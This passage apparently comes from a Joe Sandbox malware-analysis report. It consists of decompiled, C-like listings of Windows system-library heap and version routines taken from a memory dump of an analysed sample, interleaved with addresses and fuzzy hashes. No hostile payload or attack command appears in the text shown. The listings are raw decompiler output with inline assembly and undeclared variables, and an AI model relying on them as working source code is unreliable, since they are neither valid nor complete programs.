                                                                                                            					return E010AB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
                                                                                                            				}
                                                                                                            				_t77 = _a4;
                                                                                                            				if((_t77 & 0x00000001) != 0) {
                                                                                                            					goto L22;
                                                                                                            				}
                                                                                                            				_t8 = _t77 + 0x34; // 0xdce0ba00
                                                                                                            				if(_t45 !=  *_t8) {
                                                                                                            					goto L22;
                                                                                                            				}
                                                                                                            				_t9 = _t77 + 0x24; // 0x1158504
                                                                                                            				E01082280(_t9, _t9);
                                                                                                            				_t87 = 0x78;
                                                                                                            				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
                                                                                                            				E010AFA60( &_v156, 0, _t87);
                                                                                                            				_t13 = _t77 + 0x30; // 0x3db8
                                                                                                            				_t85 =  &_v156;
                                                                                                            				_v36 =  *_t13;
                                                                                                            				_v28 = _v168;
                                                                                                            				_v32 = 0;
                                                                                                            				_v24 = 0;
                                                                                                            				_v20 = _v158;
                                                                                                            				_v160 = 0;
                                                                                                            				while(1) {
                                                                                                            					_push( &_v164);
                                                                                                            					_push(_t87);
                                                                                                            					_push(_t85);
                                                                                                            					_push(0x18);
                                                                                                            					_push( &_v36);
                                                                                                            					_push(0x1e);
                                                                                                            					_t88 = E010AB0B0();
                                                                                                            					if(_t88 != 0xc0000023) {
                                                                                                            						break;
                                                                                                            					}
                                                                                                            					if(_t85 !=  &_v156) {
                                                                                                            						L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
                                                                                                            					}
                                                                                                            					_t84 = L01084620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
                                                                                                            					_v168 = _v164;
                                                                                                            					if(_t84 == 0) {
                                                                                                            						_t88 = 0xc0000017;
                                                                                                            						goto L19;
                                                                                                            					} else {
                                                                                                            						_t74 = _v160 + 1;
                                                                                                            						_v160 = _t74;
                                                                                                            						if(_t74 >= 0x10) {
                                                                                                            							L19:
                                                                                                            							_t86 = E0106CCC0(_t88);
                                                                                                            							if(_t86 != 0) {
                                                                                                            								L8:
                                                                                                            								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
                                                                                                            								_t30 = _t77 + 0x24; // 0x1158504
                                                                                                            								E0107FFB0(_t77, _t84, _t30);
                                                                                                            								if(_t84 != 0 && _t84 !=  &_v156) {
                                                                                                            									L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
                                                                                                            								}
                                                                                                            								if(_t86 != 0) {
                                                                                                            									goto L12;
                                                                                                            								} else {
                                                                                                            									goto L11;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							L6:
                                                                                                            							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
                                                                                                            							if(_v164 != 0) {
                                                                                                            								_t83 = _t84;
                                                                                                            								E01094F49(_t77, _t84);
                                                                                                            							}
                                                                                                            							goto L8;
                                                                                                            						}
                                                                                                            						_t87 = _v168;
                                                                                                            						continue;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				if(_t88 != 0) {
                                                                                                            					goto L19;
                                                                                                            				}
                                                                                                            				goto L6;
                                                                                                            			}


























                                                                                                            0x01094c53
                                                                                                            0x01094c54
                                                                                                            0x01094c55
                                                                                                            0x01094c56
                                                                                                            0x01094c5b
                                                                                                            0x01094c5c
                                                                                                            0x01094c63
                                                                                                            0x01094c6b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d6776
                                                                                                            0x010d6784
                                                                                                            0x010d6784
                                                                                                            0x010d679f
                                                                                                            0x010d67a7
                                                                                                            0x010d67af
                                                                                                            0x010d67ce
                                                                                                            0x00000000
                                                                                                            0x010d67b1
                                                                                                            0x010d67b7
                                                                                                            0x010d67b8
                                                                                                            0x010d67c1
                                                                                                            0x010d67d3
                                                                                                            0x010d67d9
                                                                                                            0x010d67dd
                                                                                                            0x01094c94
                                                                                                            0x01094c94
                                                                                                            0x01094c98
                                                                                                            0x01094c9c
                                                                                                            0x01094ca3
                                                                                                            0x010d67f4
                                                                                                            0x010d67f4
                                                                                                            0x01094cb5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01094cb5
                                                                                                            0x01094c79
                                                                                                            0x01094c7e
                                                                                                            0x01094c89
                                                                                                            0x01094c8b
                                                                                                            0x01094c8f
                                                                                                            0x01094c8f
                                                                                                            0x00000000
                                                                                                            0x01094c89
                                                                                                            0x010d67c3
                                                                                                            0x00000000
                                                                                                            0x010d67c3
                                                                                                            0x010d67af
                                                                                                            0x01094c73
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9a68d37c6b572bc87935c100063786d199055b66ef2a2358479cebfad58225c6
                                                                                                            • Instruction ID: b78de0a23f9e1af921f5a9d615aa5655ee6a1ff89e9f6e8d396b71ccbcc56aff
                                                                                                            • Opcode Fuzzy Hash: 9a68d37c6b572bc87935c100063786d199055b66ef2a2358479cebfad58225c6
                                                                                                            • Instruction Fuzzy Hash: 2F419E71A0026D9EDF61EF68CA40BEE77F4FF45710F0100A5E988AB241EA759E81CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 78%
                                                                                                            			E01094D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                                            				signed int _v12;
                                                                                                            				char _v176;
                                                                                                            				char _v177;
                                                                                                            				char _v184;
                                                                                                            				intOrPtr _v192;
                                                                                                            				intOrPtr _v196;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				signed short _t42;
                                                                                                            				char* _t44;
                                                                                                            				intOrPtr _t46;
                                                                                                            				intOrPtr _t50;
                                                                                                            				char* _t57;
                                                                                                            				intOrPtr _t59;
                                                                                                            				intOrPtr _t67;
                                                                                                            				signed int _t69;
                                                                                                            
                                                                                                            				_t64 = __edx;
                                                                                                            				_v12 =  *0x115d360 ^ _t69;
                                                                                                            				_t65 = 0xa0;
                                                                                                            				_v196 = __edx;
                                                                                                            				_v177 = 0;
                                                                                                            				_t67 = __ecx;
                                                                                                            				_v192 = __ecx;
                                                                                                            				E010AFA60( &_v176, 0, 0xa0);
                                                                                                            				_t57 =  &_v176;
                                                                                                            				_t59 = 0xa0;
                                                                                                            				if( *0x1157bc8 != 0) {
                                                                                                            					L3:
                                                                                                            					while(1) {
                                                                                                            						asm("movsd");
                                                                                                            						asm("movsd");
                                                                                                            						asm("movsd");
                                                                                                            						asm("movsd");
                                                                                                            						_t67 = _v192;
                                                                                                            						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                                                                                                            						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
                                                                                                            						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                                                                                                            						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                                                                                                            						_push( &_v184);
                                                                                                            						_push(_t59);
                                                                                                            						_push(_t57);
                                                                                                            						_push(0xa0);
                                                                                                            						_push(_t57);
                                                                                                            						_push(0xf);
                                                                                                            						_t42 = E010AB0B0();
                                                                                                            						if(_t42 != 0xc0000023) {
                                                                                                            							break;
                                                                                                            						}
                                                                                                            						if(_v177 != 0) {
                                                                                                            							L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                                                                                            						}
                                                                                                            						_v177 = 1;
                                                                                                            						_t44 = L01084620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                                                                                                            						_t59 = _v184;
                                                                                                            						_t57 = _t44;
                                                                                                            						if(_t57 != 0) {
                                                                                                            							continue;
                                                                                                            						} else {
                                                                                                            							_t42 = 0xc0000017;
                                                                                                            							break;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					if(_t42 != 0) {
                                                                                                            						_t65 = E0106CCC0(_t42);
                                                                                                            						if(_t65 != 0) {
                                                                                                            							L10:
                                                                                                            							if(_v177 != 0) {
                                                                                                            								if(_t57 != 0) {
                                                                                                            									L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                                                                                            								}
                                                                                                            							}
                                                                                                            							_t46 = _t65;
                                                                                                            							L12:
                                                                                                            							return E010AB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                                                                                                            						}
                                                                                                            						L7:
                                                                                                            						_t50 = _a4;
                                                                                                            						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                                                                                                            						if(_t50 != 3) {
                                                                                                            							if(_t50 == 2) {
                                                                                                            								goto L8;
                                                                                                            							}
                                                                                                            							L9:
                                                                                                            							if(E010AF380(_t67 + 0xc, 0x1045138, 0x10) == 0) {
                                                                                                            								 *0x11560d8 = _t67;
                                                                                                            							}
                                                                                                            							goto L10;
                                                                                                            						}
                                                                                                            						L8:
                                                                                                            						_t64 = _t57 + 0x28;
                                                                                                            						E01094F49(_t67, _t57 + 0x28);
                                                                                                            						goto L9;
                                                                                                            					}
                                                                                                            					_t65 = 0;
                                                                                                            					goto L7;
                                                                                                            				}
                                                                                                            				if(E01094E70(0x11586b0, 0x1095690, 0, 0) != 0) {
                                                                                                            					_t46 = E0106CCC0(_t56);
                                                                                                            					goto L12;
                                                                                                            				} else {
                                                                                                            					_t59 = 0xa0;
                                                                                                            					goto L3;
                                                                                                            				}
                                                                                                            			}




















                                                                                                            0x01094e01
                                                                                                            0x01094da5
                                                                                                            0x010d6c6b
                                                                                                            0x00000000
                                                                                                            0x01094dab
                                                                                                            0x01094dab
                                                                                                            0x00000000
                                                                                                            0x01094dab

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 50942775cdce3a912953a7a22d7c3fc769552ab4eba76548f70616aec51aeea9
                                                                                                            • Instruction ID: 6c2045a8db88f5c8c6ec316a96d8b4dbb439737874edde4f60fb433fbf16545f
                                                                                                            • Opcode Fuzzy Hash: 50942775cdce3a912953a7a22d7c3fc769552ab4eba76548f70616aec51aeea9
                                                                                                            • Instruction Fuzzy Hash: BB41BF71A443189FEF62DF18CD90FAAB7A9EB14710F0040AAE985DB281DB70DD85CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0112AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v12;
                                                                                                            				signed int _v16;
                                                                                                            				signed char _v20;
                                                                                                            				intOrPtr _v24;
                                                                                                            				char* _t37;
                                                                                                            				void* _t47;
                                                                                                            				signed char _t51;
                                                                                                            				void* _t53;
                                                                                                            				char _t55;
                                                                                                            				intOrPtr _t57;
                                                                                                            				signed char _t61;
                                                                                                            				intOrPtr _t75;
                                                                                                            				void* _t76;
                                                                                                            				signed int _t81;
                                                                                                            				intOrPtr _t82;
                                                                                                            
                                                                                                            				_t53 = __ecx;
                                                                                                            				_t55 = 0;
                                                                                                            				_v20 = _v20 & 0;
                                                                                                            				_t75 = __edx;
                                                                                                            				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
                                                                                                            				_v24 = __edx;
                                                                                                            				_v12 = 0;
                                                                                                            				if((_t81 & 0x01000000) != 0) {
                                                                                                            					L5:
                                                                                                            					if(_a8 != 0) {
                                                                                                            						_t81 = _t81 | 0x00000008;
                                                                                                            					}
                                                                                                            					_t57 = E0112ABF4(_t55 + _t75, _t81);
                                                                                                            					_v8 = _t57;
                                                                                                            					if(_t57 < _t75 || _t75 > 0x7fffffff) {
                                                                                                            						_t76 = 0;
                                                                                                            						_v16 = _v16 & 0;
                                                                                                            					} else {
                                                                                                            						_t59 = _t53;
                                                                                                            						_t76 = E0112AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
                                                                                                            						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
                                                                                                            							_t47 = E0112AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
                                                                                                            							_t61 = _v20;
                                                                                                            							if(_t61 != 0) {
                                                                                                            								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
                                                                                                            								if(E0110CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
                                                                                                            									L010877F0(_t53, 0, _t76);
                                                                                                            									_t76 = 0;
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t82 = _v8;
                                                                                                            					L16:
                                                                                                            					if(E01087D50() == 0) {
                                                                                                            						_t37 = 0x7ffe0380;
                                                                                                            					} else {
                                                                                                            						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                            					}
                                                                                                            					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                                                            						E0112131B(_t53, _t76, _t82, _v16);
                                                                                                            					}
                                                                                                            					return _t76;
                                                                                                            				}
                                                                                                            				_t51 =  *(__ecx + 0x20);
                                                                                                            				_v20 = _t51;
                                                                                                            				if(_t51 == 0) {
                                                                                                            					goto L5;
                                                                                                            				}
                                                                                                            				_t81 = _t81 | 0x00000008;
                                                                                                            				if(E0110CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
                                                                                                            					_t55 = _v12;
                                                                                                            					goto L5;
                                                                                                            				} else {
                                                                                                            					_t82 = 0;
                                                                                                            					_t76 = 0;
                                                                                                            					_v16 = _v16 & 0;
                                                                                                            					goto L16;
                                                                                                            				}
                                                                                                            			}




















                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                                                            • Instruction ID: 7df3afecacc439f36f65c450b40cd05393a30260dd3e91f466c6c18748f057fd
                                                                                                            • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                                                            • Instruction Fuzzy Hash: C4312232F00225ABEB1D9B69DC44BBFFBBBEF84210F058469E801A7A81DB70CD10C650
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 94%
                                                                                                            			E01078A0A(intOrPtr* __ecx, signed int __edx) {
                                                                                                            				signed int _v8;
                                                                                                            				char _v524;
                                                                                                            				signed int _v528;
                                                                                                            				void* _v532;
                                                                                                            				char _v536;
                                                                                                            				char _v540;
                                                                                                            				char _v544;
                                                                                                            				intOrPtr* _v548;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				signed int _t44;
                                                                                                            				void* _t46;
                                                                                                            				void* _t48;
                                                                                                            				signed int _t53;
                                                                                                            				signed int _t55;
                                                                                                            				intOrPtr* _t62;
                                                                                                            				void* _t63;
                                                                                                            				unsigned int _t75;
                                                                                                            				signed int _t79;
                                                                                                            				unsigned int _t81;
                                                                                                            				unsigned int _t83;
                                                                                                            				signed int _t84;
                                                                                                            				void* _t87;
                                                                                                            
                                                                                                            				_t76 = __edx;
                                                                                                            				_v8 =  *0x115d360 ^ _t84;
                                                                                                            				_v536 = 0x200;
                                                                                                            				_t79 = 0;
                                                                                                            				_v548 = __edx;
                                                                                                            				_v544 = 0;
                                                                                                            				_t62 = __ecx;
                                                                                                            				_v540 = 0;
                                                                                                            				_v532 =  &_v524;
                                                                                                            				if(__edx == 0 || __ecx == 0) {
                                                                                                            					L6:
                                                                                                            					return E010AB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
                                                                                                            				} else {
                                                                                                            					_v528 = 0;
                                                                                                            					E0107E9C0(1, __ecx, 0, 0,  &_v528);
                                                                                                            					_t44 = _v528;
                                                                                                            					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
                                                                                                            					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
                                                                                                            					_t46 = 0xa;
                                                                                                            					_t87 = _t81 - _t46;
                                                                                                            					if(_t87 > 0 || _t87 == 0) {
                                                                                                            						 *_v548 = 0x1041180;
                                                                                                            						L5:
                                                                                                            						_t79 = 1;
                                                                                                            						goto L6;
                                                                                                            					} else {
                                                                                                            						_t48 = E01091DB5(_t62,  &_v532,  &_v536);
                                                                                                            						_t76 = _v528;
                                                                                                            						if(_t48 == 0) {
                                                                                                            							L9:
                                                                                                            							E010A3C2A(_t81, _t76,  &_v544);
                                                                                                            							 *_v548 = _v544;
                                                                                                            							goto L5;
                                                                                                            						}
                                                                                                            						_t62 = _v532;
                                                                                                            						if(_t62 != 0) {
                                                                                                            							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
                                                                                                            							_t53 =  *_t62;
                                                                                                            							_v528 = _t53;
                                                                                                            							if(_t53 != 0) {
                                                                                                            								_t63 = _t62 + 4;
                                                                                                            								_t55 = _v528;
                                                                                                            								do {
                                                                                                            									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
                                                                                                            										if(E01078999(_t63,  &_v540) == 0) {
                                                                                                            											_t55 = _v528;
                                                                                                            										} else {
                                                                                                            											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
                                                                                                            											_t55 = _v528;
                                                                                                            											if(_t75 >= _t83) {
                                                                                                            												_t83 = _t75;
                                                                                                            											}
                                                                                                            										}
                                                                                                            									}
                                                                                                            									_t63 = _t63 + 0x14;
                                                                                                            									_t55 = _t55 - 1;
                                                                                                            									_v528 = _t55;
                                                                                                            								} while (_t55 != 0);
                                                                                                            								_t62 = _v532;
                                                                                                            							}
                                                                                                            							if(_t62 !=  &_v524) {
                                                                                                            								L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
                                                                                                            							}
                                                                                                            							_t76 = _t83 & 0x0000ffff;
                                                                                                            							_t81 = _t83 >> 0x10;
                                                                                                            						}
                                                                                                            						goto L9;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}




























                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 14c82226e13c1ae8482c64686e69e8e86be988d27b7136d2a6473c05412b5dd1
                                                                                                            • Instruction ID: b34175a20fea16bccf51b8bad95f25aa12af78bde0009e119a443e305323fc9a
                                                                                                            • Opcode Fuzzy Hash: 14c82226e13c1ae8482c64686e69e8e86be988d27b7136d2a6473c05412b5dd1
                                                                                                            • Instruction Fuzzy Hash: 65416FB0E0022D9BDB64DF59C88CAF9B7F4EB54300F1081EAD95997252E7709E80CF64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 76%
                                                                                                            			E0112FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
                                                                                                            				char _v8;
                                                                                                            				signed int _v12;
                                                                                                            				signed int _t29;
                                                                                                            				char* _t32;
                                                                                                            				char* _t43;
                                                                                                            				signed int _t80;
                                                                                                            				signed int* _t84;
                                                                                                            
                                                                                                            				_push(__ecx);
                                                                                                            				_push(__ecx);
                                                                                                            				_t56 = __edx;
                                                                                                            				_t84 = __ecx;
                                                                                                            				_t80 = E0112FD4E(__ecx, __edx);
                                                                                                            				_v12 = _t80;
                                                                                                            				if(_t80 != 0) {
                                                                                                            					_t29 =  *__ecx & _t80;
                                                                                                            					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
                                                                                                            					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
                                                                                                            						E01130A13(__ecx, _t80, 0, _a4);
                                                                                                            						_t80 = 1;
                                                                                                            						if(E01087D50() == 0) {
                                                                                                            							_t32 = 0x7ffe0380;
                                                                                                            						} else {
                                                                                                            							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                            						}
                                                                                                            						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                                                            							_push(3);
                                                                                                            							L21:
                                                                                                            							E01121608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
                                                                                                            						}
                                                                                                            						goto L22;
                                                                                                            					}
                                                                                                            					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
                                                                                                            						_t80 = E01132B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
                                                                                                            						if(_t80 != 0) {
                                                                                                            							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
                                                                                                            							_t77 = _v8;
                                                                                                            							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
                                                                                                            								E0112C8F7(_t66, _t77, 0);
                                                                                                            							}
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						_t80 = E0112DBD2(__ecx[0xb], _t74, __edx, _a4);
                                                                                                            					}
                                                                                                            					if(E01087D50() == 0) {
                                                                                                            						_t43 = 0x7ffe0380;
                                                                                                            					} else {
                                                                                                            						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                            					}
                                                                                                            					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
                                                                                                            						goto L22;
                                                                                                            					} else {
                                                                                                            						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
                                                                                                            						goto L21;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					_push(__ecx);
                                                                                                            					_push(_t80);
                                                                                                            					E0112A80D(__ecx[0xf], 9, __edx, _t80);
                                                                                                            					L22:
                                                                                                            					return _t80;
                                                                                                            				}
                                                                                                            			}











                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                                                            • Instruction ID: 714aeccd982e6cf7d651a50b753651daf7edd44c9041f9e577fb10df4f5a9c3d
                                                                                                            • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                                                            • Instruction Fuzzy Hash: 48312632300662AFD32E9B6CC844F6BBBF9EBC5A50F194058E5468B346DB74DC62C761
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 70%
                                                                                                            			E0112EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
                                                                                                            				signed int _v8;
                                                                                                            				char _v12;
                                                                                                            				intOrPtr _v15;
                                                                                                            				char _v16;
                                                                                                            				intOrPtr _v19;
                                                                                                            				void* _v28;
                                                                                                            				intOrPtr _v36;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				signed char _t26;
                                                                                                            				signed int _t27;
                                                                                                            				char* _t40;
                                                                                                            				unsigned int* _t50;
                                                                                                            				intOrPtr* _t58;
                                                                                                            				unsigned int _t59;
                                                                                                            				char _t75;
                                                                                                            				signed int _t86;
                                                                                                            				intOrPtr _t88;
                                                                                                            				intOrPtr* _t91;
                                                                                                            
                                                                                                            				_t75 = __edx;
                                                                                                            				_t91 = __ecx;
                                                                                                            				_v12 = __edx;
                                                                                                            				_t50 = __ecx + 0x30;
                                                                                                            				_t86 = _a4 & 0x00000001;
                                                                                                            				if(_t86 == 0) {
                                                                                                            					E01082280(_t26, _t50);
                                                                                                            					_t75 = _v16;
                                                                                                            				}
                                                                                                            				_t58 = _t91;
                                                                                                            				_t27 = E0112E815(_t58, _t75);
                                                                                                            				_v8 = _t27;
                                                                                                            				if(_t27 != 0) {
                                                                                                            					E0106F900(_t91 + 0x34, _t27);
                                                                                                            					if(_t86 == 0) {
                                                                                                            						E0107FFB0(_t50, _t86, _t50);
                                                                                                            					}
                                                                                                            					_push( *((intOrPtr*)(_t91 + 4)));
                                                                                                            					_push( *_t91);
                                                                                                            					_t59 =  *(_v8 + 0x10);
                                                                                                            					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
                                                                                                            					_push(0x8000);
                                                                                                            					_t11 = _t53 - 1; // 0x0
                                                                                                            					_t12 = _t53 - 1; // 0x0
                                                                                                            					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
                                                                                                            					E0112AFDE( &_v12,  &_v16);
                                                                                                            					asm("lock xadd [eax], ecx");
                                                                                                            					asm("lock xadd [eax], ecx");
                                                                                                            					E0112BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
                                                                                                            					_t55 = _v36;
                                                                                                            					_t88 = _v36;
                                                                                                            					if(E01087D50() == 0) {
                                                                                                            						_t40 = 0x7ffe0388;
                                                                                                            					} else {
                                                                                                            						_t55 = _v19;
                                                                                                            						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                            					}
                                                                                                            					if( *_t40 != 0) {
                                                                                                            						E0111FE3F(_t55, _t91, _v15, _t55);
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					if(_t86 == 0) {
                                                                                                            						E0107FFB0(_t50, _t86, _t50);
                                                                                                            						_t75 = _v16;
                                                                                                            					}
                                                                                                            					_push(_t58);
                                                                                                            					_t88 = 0;
                                                                                                            					_push(0);
                                                                                                            					E0112A80D(_t91, 8, _t75, 0);
                                                                                                            				}
                                                                                                            				return _t88;
                                                                                                            			}























                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                                                            • Instruction ID: 83efcc136167e6eaf2589c5ec57b45630f673d65a4db1bf679d51556196f5477
                                                                                                            • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                                                            • Instruction Fuzzy Hash: 0A31B272605716ABC71DDF28C880A6BB7A9FFD0210F04492DF59687645EF30E815CBA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 69%
                                                                                                            			E010E69A6(signed short* __ecx, void* __eflags) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				signed int _v24;
                                                                                                            				signed short _v28;
                                                                                                            				signed int _v32;
                                                                                                            				intOrPtr _v36;
                                                                                                            				signed int _v40;
                                                                                                            				char* _v44;
                                                                                                            				signed int _v48;
                                                                                                            				intOrPtr _v52;
                                                                                                            				signed int _v56;
                                                                                                            				char _v60;
                                                                                                            				signed int _v64;
                                                                                                            				char _v68;
                                                                                                            				char _v72;
                                                                                                            				signed short* _v76;
                                                                                                            				signed int _v80;
                                                                                                            				char _v84;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				void* _t68;
                                                                                                            				intOrPtr _t73;
                                                                                                            				signed short* _t74;
                                                                                                            				void* _t77;
                                                                                                            				void* _t78;
                                                                                                            				signed int _t79;
                                                                                                            				signed int _t80;
                                                                                                            
                                                                                                            				_v8 =  *0x115d360 ^ _t80;
                                                                                                            				_t75 = 0x100;
                                                                                                            				_v64 = _v64 & 0x00000000;
                                                                                                            				_v76 = __ecx;
                                                                                                            				_t79 = 0;
                                                                                                            				_t68 = 0;
                                                                                                            				_v72 = 1;
                                                                                                            				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
                                                                                                            				_t77 = 0;
                                                                                                            				if(L01076C59(__ecx[2], 0x100, __eflags) != 0) {
